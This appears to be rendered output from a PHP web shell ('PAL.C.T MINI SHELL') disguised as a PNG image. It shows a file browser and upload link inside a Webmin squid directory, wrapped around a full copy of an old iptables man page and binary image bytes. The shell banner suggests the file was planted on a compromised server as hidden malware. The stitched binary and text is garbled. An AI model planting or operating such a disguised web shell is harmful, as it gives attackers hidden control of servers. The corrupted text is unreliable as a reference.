php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/squid/
upload
files >> //usr/libexec/webmin/squid/nat



IPTABLES(8)                                           IPTABLES(8)


NNAAMMEE
       iptables - IP packet filter administration

SSYYNNOOPPSSIISS
       iippttaabblleess --[[AADDCC]] chain rule-specification [options]
       iippttaabblleess --[[RRII]] chain rulenum rule-specification [options]
       iippttaabblleess --DD chain rulenum [options]
       iippttaabblleess --[[LLFFZZ]] [chain] [options]
       iippttaabblleess --[[NNXX]] chain
       iippttaabblleess --PP chain target [options]
       iippttaabblleess --EE old-chain-name new-chain-name

DDEESSCCRRIIPPTTIIOONN
       IIppttaabblleess  is  used  to  set  up, maintain, and inspect the
       tables of IP packet filter  rules  in  the  Linux  kernel.
       There  are  several different tables which may be defined,
       and each table contains a number of built-in  chains,  and
       may contain user-defined chains.

       Each  chain  is  a  list of rules which can match a set of
       packets: each rule specifies what  to  do  with  a  packet
       which  matches.  This is called a `target', which may be a
       jump to a user-defined chain in the same table.


TTAARRGGEETTSS
       A firewall rule specifies criteria for  a  packet,  and  a
       target.   If  the  packet does not match, the next rule in
       the chain is the examined; if it does match, then the next
       rule is specified by the value of the target, which can be
       the name of a user-defined chain, or one  of  the  special
       values _A_C_C_E_P_T, _D_R_O_P, _Q_U_E_U_E, or _R_E_T_U_R_N.

       _A_C_C_E_P_T  means  to  let  the packet through.  _D_R_O_P means to
       drop the packet on the floor.  _Q_U_E_U_E  means  to  pass  the
       packet  to userspace (if supported by the kernel).  _R_E_T_U_R_N
       means stop traversing this chain, and resume at  the  next
       rule  in  the  previous  (calling) chain.  If the end of a
       built-in chain is reached, or a rule in a  built-in  chain
       with target _R_E_T_U_R_N is matched, the target specified by the
       chain policy determines the fate of the packet.

TTAABBLLEESS
       There are current three independent tables  (which  tables
       are  present  at any time depends on the kernel configura
       tion options and which modules are present).

       --tt,, ----ttaabbllee
              This option specifies  the  packet  matching  table
              which the command should operate on.  If the kernel
              is configured with  automatic  module  loading,  an
              attempt will be made to load the appropriate module
              for that table if it is not already there.

              The tables are  as  follows:  ffiilltteerr  This  is  the
              default  table,  and  contains  the built-in chains
              INPUT (for packets coming  into  the  box  itself),
              FORWARD (for packets being routed through the box),
              and OUTPUT (for  locally-generated  packets).   nnaatt
              This table is consulted when a packet which is cre
              ates a new connection is encountered.  It  consists
              of  three built-ins: PREROUTING (for altering pack
              ets as soon as they come in), OUTPUT (for  altering
              locally-generated   packets  before  routing),  and
              POSTROUTING (for altering packets as they are about
              to go out).  mmaannggllee This table is used for special
              ized  packet  alteration.   It  has  two   built-in
              chains:  PREROUTING  (for altering incoming packets
              before routing) and OUTPUT (for  altering  locally-
              generated packets before routing).

OOPPTTIIOONNSS
       The options that are recognized by iippttaabblleess can be divided
       into several different groups.

   CCOOMMMMAANNDDSS
       These options specify the specific action to perform; only
       one  of  them can be specified on the command line, unless
       otherwise specified below.  For all the long  versions  of
       the  command and option names, you only need to use enough
       letters to ensure that iippttaabblleess can differentiate it  from
       all other options.

       --AA,, ----aappppeenndd
              Append one or more rules to the end of the selected
              chain.  When the source  and/or  destination  names
              resolve  to  more  than one address, a rule will be
              added for each possible address combination.

       --DD,, ----ddeelleettee
              Delete one or more rules from the  selected  chain.
              There  are  two  versions of this command: the rule
              can be specified as a number in the chain (starting
              at 1 for the first rule) or a rule to match.

       --RR,, ----rreeppllaaccee
              Replace  a  rule  in  the  selected  chain.  If the
              source and/or destination names resolve to multiple
              addresses,  the  command will fail.  Rules are num
              bered starting at 1.

       --II,, ----iinnsseerrtt
              Insert one or more rules in the selected  chain  as
              the  given  rule number.  So, if the rule number is
              1, the rule or rules are inserted at  the  head  of
              the  chain.   This  is  also the default if no rule
              number is specified.

       --LL,, ----lliisstt
              List all rules in the selected chain.  If no  chain
              is selected, all chains are listed.  It is legal to
              specify the --ZZ (zero) option as well, in which case
              the  chain(s) will be atomically listed and zeroed.
              The exact output is effected by the other arguments
              given.

       --FF,, ----fflluusshh
              Flush  the  selected  chain.  This is equivalent to
              deleting all the rules one by one.

       --ZZ,, ----zzeerroo
              Zero the packet and byte counters  in  all  chains.
              It is legal to specify the --LL,, ----lliisstt (list) option
              as well, to see  the  counters  immediately  before
              they are cleared; see above.

       --NN,, ----nneeww--cchhaaiinn
              Create  a new user-defined chain of the given name.
              There must be no target of that name already.

       --XX,, ----ddeelleettee--cchhaaiinn
              Delete the  specified  user-defined  chain.   There
              must  be  no  references to the chain (if there are
              you must delete  or  replace  the  referring  rules
              before  the  chain can be deleted).  If no argument
              is given, it will  attempt  to  delete  every  non-
              builtin chain in the table.

       --PP,, ----ppoolliiccyy
              Set  the  policy for the chain to the given target.
              See the section  TTAARRGGEETTSS  for  the  legal  targets.
              Only non-user-defined chains can have policies, and
              neither built-in nor  user-defined  chains  can  be
              policy targets.

       --EE,, ----rreennaammee--cchhaaiinn
              Rename  the  user  specified chain to the user sup
              plied name; this is cosmetic, and has no effect  on
              the structure of the table.

       --hh     Help.  Give a (currently very brief) description of
              the command syntax.

   PPAARRAAMMEETTEERRSS
       The following parameters make up a rule specification  (as
       used  in  the  add, delete, replace, append and check com
       mands).

       --pp,, ----pprroottooccooll [!] _p_r_o_t_o_c_o_l
              The protocol of the rule or of the packet to check.
              The  specified  protocol  can  be  one of _t_c_p, _u_d_p,
              _i_c_m_p, or _a_l_l, or it can be a numeric value,  repre
              senting  one of these protocols or a different one.
              A  protocol  name  from  /etc/protocols   is   also
              allowed.    A  "!"  argument  before  the  protocol
              inverts the test.  The number zero is equivalent to
              _a_l_l.   Protocol  _a_l_l  will match with all protocols
              and is taken as default when this option  is  omit
              ted.

       --ss,, ----ssoouurrccee [!] _a_d_d_r_e_s_s[/_m_a_s_k]
              Source  specification.   _A_d_d_r_e_s_s  can  be  either a
              hostname, a network name, or a  plain  IP  address.
              The  _m_a_s_k  can  be either a network mask or a plain
              number, specifying the number of 1's  at  the  left
              side  of  the  network mask.  Thus, a mask of _2_4 is
              equivalent to _2_5_5_._2_5_5_._2_5_5_._0.  A "!" argument before
              the  address specification inverts the sense of the
              address. The flag ----ssrrcc is a convenient  alias  for
              this option.

       --dd,, ----ddeessttiinnaattiioonn [!] _a_d_d_r_e_s_s[/_m_a_s_k]
              Destination  specification.  See the description of
              the --ss (source) flag for a detailed description  of
              the  syntax.   The  flag ----ddsstt is an alias for this
              option.

       --jj,, ----jjuummpp _t_a_r_g_e_t
              This specifies the target of the rule; ie. what  to
              do  if  the packet matches it.  The target can be a
              user-defined chain (not the one this rule  is  in),
              one of the special builtin targets which decide the
              fate of the packet  immediately,  or  an  extension
              (see  EEXXTTEENNSSIIOONNSS below).  If this option is omitted
              in a rule, then matching  the  rule  will  have  no
              effect  on  the  packet's fate, but the counters on
              the rule will be incremented.

       --ii,, ----iinn--iinntteerrffaaccee [!] [_n_a_m_e]
              Optional name of an interface via which a packet is
              received  (for  packets entering the IINNPPUUTT, FFOORRWWAARRDD
              and PPRREERROOUUTTIINNGG chains).  When the "!"  argument  is
              used  before  the  interface  name,  the  sense  is
              inverted.  If the interface name  ends  in  a  "+",
              then any interface which begins with this name will
              match.  If this option is omitted, the  string  "+"
              is  assumed,  which  will  match with any interface
              name.

       --oo,, ----oouutt--iinntteerrffaaccee [!] [_n_a_m_e]
              Optional name of an interface via which a packet is
              going to be sent (for packets entering the FFOORRWWAARRDD,
              OOUUTTPPUUTT and PPOOSSTTRROOUUTTIINNGG chains).  When the "!" argu
              ment  is  used before the interface name, the sense
              is inverted.  If the interface name ends in a  "+",
              then any interface which begins with this name will
              match.  If this option is omitted, the  string  "+"
              is  assumed,  which  will  match with any interface
              name.

       [[!!]]  --ff,, ----ffrraaggmmeenntt
              This means that the rule only refers to second  and
              further  fragments  of  fragmented  packets.  Since
              there is no way to tell the source  or  destination
              ports  of  such  a  packet  (or  ICMP type), such a
              packet will not match any rules which specify them.
              When  the  "!" argument precedes the "-f" flag, the
              rule will only match  head  fragments,  or  unfrag
              mented packets.

   OOTTHHEERR OOPPTTIIOONNSS
       The following additional options can be specified:

       --vv,, ----vveerrbboossee
              Verbose output.  This option makes the list command
              show the interface address, the  rule  options  (if
              any), and the TOS masks.  The packet and byte coun
              ters are also listed, with the suffix 'K',  'M'  or
              'G' for 1000, 1,000,000 and 1,000,000,000 multipli
              ers respectively (but see the  --xx  flag  to  change
              this).   For  appending,  insertion,  deletion  and
              replacement, this causes  detailed  information  on
              the rule or rules to be printed.

       --nn,, ----nnuummeerriicc
              Numeric output.  IP addresses and port numbers will
              be printed in numeric format.  By default, the pro
              gram  will  try to display them as host names, net
              work names, or services (whenever applicable).

       --xx,, ----eexxaacctt
              Expand numbers.  Display the  exact  value  of  the
              packet  and  byte  counters,  instead  of  only the
              rounded number in K's (multiples of 1000) M's (mul
              tiples of 1000K) or G's (multiples of 1000M).  This
              option is only relevant for the --LL command.

       ----lliinnee--nnuummbbeerrss
              When listing rules, add line numbers to the  begin
              ning  of  each  rule,  corresponding to that rule's
              position in the chain.

MMAATTCCHH EEXXTTEENNSSIIOONNSS
       iptables can use extended packet matching modules.   These
       are  loaded in two ways: implicitly, when --pp or ----pprroottooccooll
       is specified, or with the --mm or ----mmaattcchh options,  followed
       by  the  matching  module name; after these, various extra
       command line options become available,  depending  on  the
       specific  module.  You can specify multiple extended match
       modules in one line, and you can  use  the  --hh  or  ----hheellpp
       options  after  the  module  has been specified to receive
       help specific to that module.

       The following are included in the base package,  and  most
       of  these  can  be preceded by a !!  to invert the sense of
       the match.

   ttccpp
       These extensions are loaded if `--protocol tcp' is  speci
       fied. It provides the following options:

       ----ssoouurrccee--ppoorrtt [!] [_p_o_r_t_[_:_p_o_r_t_]]
              Source  port  or port range specification. This can
              either be a service  name  or  a  port  number.  An
              inclusive  range  can  also be specified, using the
              format _p_o_r_t:_p_o_r_t.  If the first  port  is  omitted,
              "0"  is assumed; if the last is omitted, "65535" is
              assumed.  If the second port greater then the first
              they will be swapped.  The flag ----ssppoorrtt is an alias
              for this option.

       ----ddeessttiinnaattiioonn--ppoorrtt [!] [_p_o_r_t_[_:_p_o_r_t_]]
              Destination port or port range  specification.  The
              flag ----ddppoorrtt is an alias for this option.

       ----ttccpp--ffllaaggss [!] _m_a_s_k _c_o_m_p
              Match  when  the  TCP  flags are as specified.  The
              first argument is the flags which we  should  exam
              ine,  written  as  a  comma-separated list, and the
              second argument is a comma-separated list of  flags
              which  must be set.  Flags are: SSYYNN AACCKK FFIINN RRSSTT UURRGG
              PPSSHH AALLLL NNOONNEE.  Hence the command
               iptables   -A   FORWARD   -p    tcp    --tcp-flags
              SYN,ACK,FIN,RST SYN
              will  only match packets with the SYN flag set, and
              the ACK, FIN and RST flags unset.

       [[!!]] ----ssyynn
              Only match TCP packets with the SYN bit set and the
              ACK and FIN bits cleared.  Such packets are used to
              request TCP  connection  initiation;  for  example,
              blocking  such  packets coming in an interface will
              prevent incoming TCP connections, but outgoing  TCP
              connections  will  be unaffected.  It is equivalent
              to ----ttccpp--ffllaaggss SSYYNN,,RRSSTT,,AACCKK SSYYNN.  If  the  "!"  flag
              precedes  the  "--syn",  the sense of the option is
              inverted.

       ----ttccpp--ooppttiioonn [!] _n_u_m_b_e_r
              Match if TCP option set.

   uuddpp
       These extensions are loaded if `--protocol udp' is  speci
       fied.  It provides the following options:

       ----ssoouurrccee--ppoorrtt [!] [_p_o_r_t_[_:_p_o_r_t_]]
              Source  port  or port range specification.  See the
              description of the ----ssoouurrccee--ppoorrtt option of the  TCP
              extension for details.

       ----ddeessttiinnaattiioonn--ppoorrtt [!] [_p_o_r_t_[_:_p_o_r_t_]]
              Destination  port or port range specification.  See
              the description of the ----ddeessttiinnaattiioonn--ppoorrtt option of
              the TCP extension for details.

   iiccmmpp
       This  extension  is  loaded if `--protocol icmp' is speci
       fied.  It provides the following option:

       ----iiccmmpp--ttyyppee [!] _t_y_p_e_n_a_m_e
              This allows specification of the ICMP  type,  which
              can be a numeric ICMP type, or one of the ICMP type
              names shown by the command
               iptables -p icmp -h

   mmaacc
       ----mmaacc--ssoouurrccee [!] _a_d_d_r_e_s_s
              Match source MAC address.  It must be of  the  form
              XX:XX:XX:XX:XX:XX.  Note that this only makes sense
              for packets entering  the  PPRREERROOUUTTIINNGG,  FFOORRWWAARRDD  or
              IINNPPUUTT  chains  for  packets coming from an ethernet
              device.

   lliimmiitt
       This module matches at a limited rate using a token bucket
       filter:  it can be used in combination with the LLOOGG target
       to give limited logging.  A rule using this extension will
       match  until this limit is reached (unless the `!' flag is
       used).

       ----lliimmiitt _r_a_t_e
              Maximum average matching rate: specified as a  num
              ber,   with   an   optional  `/second',  `/minute',
              `/hour', or `/day' suffix; the default is 3/hour.

       ----lliimmiitt--bbuurrsstt _n_u_m_b_e_r
              The maximum initial number  of  packets  to  match:
              this  number  gets  recharged by one every time the
              limit specified above is not reached,  up  to  this
              number; the default is 5.

   mmuullttiippoorrtt
       This  module matches a set of source or destination ports.
       Up to 15 ports can be specified. It can only  be  used  in
       conjunction with --pp ttccpp or --pp uuddpp.

       ----ssoouurrccee--ppoorrtt [_p_o_r_t_[_,_p_o_r_t_]]
              Match if the source port is one of the given ports.

       ----ddeessttiinnaattiioonn--ppoorrtt [_p_o_r_t_[_,_p_o_r_t_]]
              Match if the destination port is one of  the  given
              ports.

       ----ppoorrtt [_p_o_r_t_[_,_p_o_r_t_]]
              Match  if the both the source and destination ports
              are equal to each other and to  one  of  the  given
              ports.

   mmaarrkk
       This  module  matches  the netfilter mark field associated
       with a packet (which can be  set  using  the  MMAARRKK  target
       below).

       ----mmaarrkk _v_a_l_u_e_[_/_m_a_s_k_]
              Matches  packets with the given unsigned mark value
              (if a mask is specified, this  is  logically  ANDed
              with the mark before the comparison).

   oowwnneerr
       This  module  attempts to match various characteristics of
       the packet creator, for locally-generated packets.  It  is
       only valid in the OOUUTTPPUUTT chain, and even this some packets
       (such as ICMP ping responses) may have no owner, and hence
       never match.

       ----uuiidd--oowwnneerr _u_s_e_r_i_d
              Matches if the packet was created by a process with
              the given effective user id.

       ----ggiidd--oowwnneerr _g_r_o_u_p_i_d
              Matches if the packet was created by a process with
              the given effective group id.

       ----ppiidd--oowwnneerr _p_r_o_c_e_s_s_i_d
              Matches if the packet was created by a process with
              the given process id.

       ----ssiidd--oowwnneerr _s_e_s_s_i_o_n_i_d
              Matches if the packet was created by a  process  in
              the given session group.

   ssttaattee
       This  module,  when  combined  with  connection  tracking,
       allows access to the connection tracking  state  for  this
       packet.

       ----ssttaattee _s_t_a_t_e
              Where  state  is a comma separated list of the con
              nection  states  to  match.   Possible  states  are
              IINNVVAALLIIDD  meaning that the packet is associated with
              no known connection, EESSTTAABBLLIISSHHEEDD meaning  that  the
              packet  is  associated  with a connection which has
              seen packets in both directions, NNEEWW  meaning  that
              the  packet has started a new connection, or other
              wise associated with a  connection  which  has  not
              seen  packets in both directions, and RREELLAATTEEDD mean
              ing that the packet is starting a  new  connection,
              but is associated with an existing connection, such
              as an FTP data transfer, or an ICMP error.

   uunncclleeaann
       This module takes no options, but attempts to match  pack
       ets  which seem malformed or unusual.  This is regarded as
       experimental.

   ttooss
       This module matches the 8 bits of Type of Service field in
       the IP header (ie. including the precedence bits).

       ----ttooss _t_o_s
              The argument is either a standard name, (use
               iptables -m tos -h
              to see the list), or a numeric value to match.

TTAARRGGEETT EEXXTTEENNSSIIOONNSS
       iptables  can  use  extended target modules: the following
       are included in the standard distribution.

   LLOOGG
       Turn on kernel logging of  matching  packets.   When  this
       option is set for a rule, the Linux kernel will print some
       information on all matching packets (like most  IP  header
       fields)  via  the  kernel  log  (where it can be read with
       _d_m_e_s_g or _s_y_s_l_o_g_d(8)).

       ----lloogg--lleevveell _l_e_v_e_l
              Level of logging (numeric or see _s_y_s_l_o_g_._c_o_n_f(5)).

       ----lloogg--pprreeffiixx _p_r_e_f_i_x
              Prefix log messages with the specified  prefix;  up
              to  29  letters long, and useful for distinguishing
              messages in the logs.

       ----lloogg--ttccpp--sseeqquueennccee
              Log TCP sequence numbers. This is a  security  risk
              if the log is readable by users.

       ----lloogg--ttccpp--ooppttiioonnss
              Log options from the TCP packet header.

       ----lloogg--iipp--ooppttiioonnss
              Log options from the IP packet header.

   MMAARRKK
       This  is  used  to set the netfilter mark value associated
       with the packet.  It is only valid in the mmaannggllee table.

       ----sseett--mmaarrkk _m_a_r_k

   RREEJJEECCTT
       This is used to send back an error packet in  response  to
       the  matched  packet:  otherwise it is equivalent to DDRROOPP.
       This target is only valid in the IINNPPUUTT, FFOORRWWAARRDD and OOUUTTPPUUTT
       chains, and user-defined chains which are only called from
       those chains.  Several options control the nature  of  the
       error packet returned:

       ----rreejjeecctt--wwiitthh _t_y_p_e
              The  type  given can be iiccmmpp--nneett--uunnrreeaacchhaabbllee, iiccmmpp--
              hhoosstt--uunnrreeaacchhaabbllee,   iiccmmpp--ppoorrtt--uunnrreeaacchhaabbllee,    iiccmmpp--
              pprroottoo--uunnrreeaacchhaabbllee, iiccmmpp--nneett--pprroohhiibbiitteeddor iiccmmpp--hhoosstt--
              pprroohhiibbiitteedd, which return the appropriate ICMP error
              message  (port-unreachable  is  the  default).  The
              option eecchhoo--rreeppllyy is also allowed; it can  only  be
              used  for  rules which specify an ICMP ping packet,
              and generates a ping reply.   Finally,  the  option
              ttccpp--rreesseett can be used on rules which only match the
              TCP protocol: this causes a TCP RST  packet  to  be
              sent  back.   This  is  mainly  useful for blocking
              _i_d_e_n_t probes which frequently  occur  when  sending
              mail  to broken mail hosts (which won't accept your
              mail otherwise).

   TTOOSS
       This is used to set the 8-bit Type of Service field in the
       IP header.  It is only valid in the mmaannggllee table.

       ----sseett--ttooss _t_o_s
              You can use a numeric TOS values, or use
               iptables -j TOS -h
              to see the list of valid TOS names.

   MMIIRRRROORR
       This is an experimental demonstration target which inverts
       the source and destination fields in  the  IP  header  and
       retransmits  the  packet.   It is only valid in the IINNPPUUTT,
       FFOORRWWAARRDD and PPRREERROOUUTTIINNGG  chains,  and  user-defined  chains
       which  are  only  called from those chains.  Note that the
       outgoing packets are NNOOTT  seen  by  any  packet  filtering
       chains,  connection  tracking  or  NAT, to avoid loops and
       other problems.

   SSNNAATT
       This target is  only  valid  in  the  nnaatt  table,  in  the
       PPOOSSTTRROOUUTTIINNGG  chain.   It specifies that the source address
       of the packet should be modified (and all  future  packets
       in this connection will also be mangled), and rules should
       cease being examined.  It takes one option:

       ----ttoo--ssoouurrccee  _<_i_p_a_d_d_r_>_[_-_<_i_p_a_d_d_r_>_]_[_:_p_o_r_t_-_p_o_r_t_]
              which can specify a single new source  IP  address,
              an inclusive range of IP addresses, and optionally,
              a port range (which is only valid if the rule  also
              specifies  --pp  ttccpp or --pp uuddpp).  If no port range is
              specified, then source  ports  below  512  will  be
              mapped to other ports below 512: those between 1024
              will be mapped to ports below 1024, and other ports
              will  be  mapped to 1024 or above.  Where possible,
              no port alteration will occur.

   DDNNAATT
       This target is only valid in the nnaatt table,  in  the  PPRREE
       RROOUUTTIINNGG  and  OOUUTTPPUUTT chains, and user-defined chains which
       are only called from those chains.  It specifies that  the
       destination  address of the packet should be modified (and
       all future packets in this connection will  also  be  man
       gled),  and  rules  should cease being examined.  It takes
       one option:

       ----ttoo--ddeessttiinnaattiioonn _<_i_p_a_d_d_r_>_[_-_<_i_p_a_d_d_r_>_]_[_:_p_o_r_t_-_p_o_r_t_]
              which can  specify  a  single  new  destination  IP
              address,  an  inclusive  range of IP addresses, and
              optionally, a port range (which is  only  valid  if
              the  rule  also specifies --pp ttccpp or --pp uuddpp).  If no
              port range is specified, then the destination  port
              will never be modified.

   MMAASSQQUUEERRAADDEE
       This  target  is  only  valid  in  the  nnaatt  table, in the
       PPOOSSTTRROOUUTTIINNGG chain.  It should only be  used  with  dynami
       cally  assigned  IP  (dialup)  connections:  if you have a
       static IP address, you should use the SNAT  target.   Mas
       querading  is equivalent to specifying a mapping to the IP
       address of the interface the packet is going out, but also
       has  the  effect  that  connections are _f_o_r_g_o_t_t_e_n when the
       interface goes down.  This is the  correct  behavior  when
       the  next  dialup  is  unlikely to have the same interface
       address (and hence any established  connections  are  lost
       anyway).  It takes one option:

       ----ttoo--ppoorrttss _<_p_o_r_t_>_[_-_<_p_o_r_t_>_]
              This  specifies  a  range  of  source ports to use,
              overriding the default SSNNAATT  source  port-selection
              heuristics (see above).  This is only valid with if
              the rule also specifies --pp ttccpp or --pp uuddpp).

   RREEDDIIRREECCTT
       This target is only valid in the nnaatt table,  in  the  PPRREE
       RROOUUTTIINNGG  and  OOUUTTPPUUTT chains, and user-defined chains which
       are only called from those chains.  It alters the destina
       tion  IP  address to send the packet to the machine itself
       (locally-generated packets are  mapped  to  the  127.0.0.1
       address).  It takes one option:

       ----ttoo--ppoorrttss _<_p_o_r_t_>_[_-_<_p_o_r_t_>_]
              This specifies a destination port or range or ports
              to use: without this, the destination port is never
              altered.   This is only valid with if the rule also
              specifies --pp ttccpp or --pp uuddpp).

EEXXTTRRAA EEXXTTEENNSSIIOONNSS
       The following extensions are not included  by  default  in
       the standard distribution.

   ttttll
       This  module  matches  the  time  to  live field in the IP
       header.

       ----ttttll _t_t_l
              Matches the given TTL value.

   TTTTLL
       This target is used to modify the time to  live  field  in
       the IP header.  It is only valid in the mmaannggllee table.

       ----ttttll--sseett _t_t_l
              Set the TTL to the given value.

       ----ttttll--ddeecc _t_t_l
              Decrement the TTL by the given value.

       ----ttttll--iinncc _t_t_l
              Increment the TTL by the given value.

   UULLOOGG
       This  target  provides userspace logging of matching pack
       ets.  When this target is set for a rule, the Linux kernel
       will  multicast  this packet through a _n_e_t_l_i_n_k socket. One
       or more userspace processes may then subscribe to  various
       multicast groups and receive the packets.

       ----uulloogg--nnllggrroouupp_<_n_l_g_r_o_u_p_>
              This  specifies  the  netlink group (1-32) to which
              the packet is sent.

       ----uulloogg--pprreeffiixx_<_p_r_e_f_i_x_>
              Prefix log messages with the specified  prefix;  up
              to  32 characters long, and useful fro distinguish
              ing messages in the logs.

       ----uulloogg--ccpprraannggee_<_s_i_z_e_>
              Number of bytes to be copied to userspace. A  value
              of 0 always copies the entire packet, regardless of
              its size.

DDIIAAGGNNOOSSTTIICCSS
       Various error messages are printed to standard error.  The
       exit  code  is  0  for  correct functioning.  Errors which
       appear to be caused by  invalid  or  abused  command  line
       parameters cause an exit code of 2, and other errors cause
       an exit code of 1.

BBUUGGSS
       Check is not implemented (yet).

CCOOMMPPAATTIIBBIILLIITTYY WWIITTHH IIPPCCHHAAIINNSS
       This iippttaabblleess is very similar to ipchains  by  Rusty  Rus
       sell.   The  main  difference is that the chains IINNPPUUTT and
       OOUUTTPPUUTT are only traversed  for  packets  coming  into  the
       local  host  and  originating  from the local host respec
       tively.  Hence every packet only passes through one of the
       three  chains;  previously  a  forwarded packet would pass
       through all three.

       The other main difference is that --ii refers to  the  input
       interface; --oo refers to the output interface, and both are
       available for packets entering the FFOORRWWAARRDD chain.

       iippttaabblleess is a pure packet filter when  using  the  default
       `filter'  table,  with  optional  extension modules.  This
       should simplify much of the previous  confusion  over  the
       combination  of  IP masquerading and packet filtering seen
       previously.  So the following options are handled  differ
       ently:
        -j MASQ
        -M -S
        -M -L
       There are several other changes in iptables.

SSEEEE AALLSSOO
       The iptables-HOWTO, which details more iptables usage, the
       NAT-HOWTO, which details NAT, and  the  netfilter-hacking-
       HOWTO which details the internals.

AAUUTTHHOORRSS
       Rusty  Russell  wrote iptables, in early consultation with
       Michael Neuling.

       Marc Boucher made Rusty abandon ipnatctl by lobbying for a
       generic packet selection framework in iptables, then wrote
       the mangle table, the owner match, the mark stuff, and ran
       around doing cool stuff everywhere.

       James Morris wrote the TOS target, and tos match.

       Jozsef Kadlecsik wrote the REJECT target.

       Harald  Welte  wrote the ULOG target, TTL match+target and
       libipulog.

       The Netfilter Core Team is: Marc Boucher, James Morris and
       Rusty Russell.






                           Aug 11, 2000                         1
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`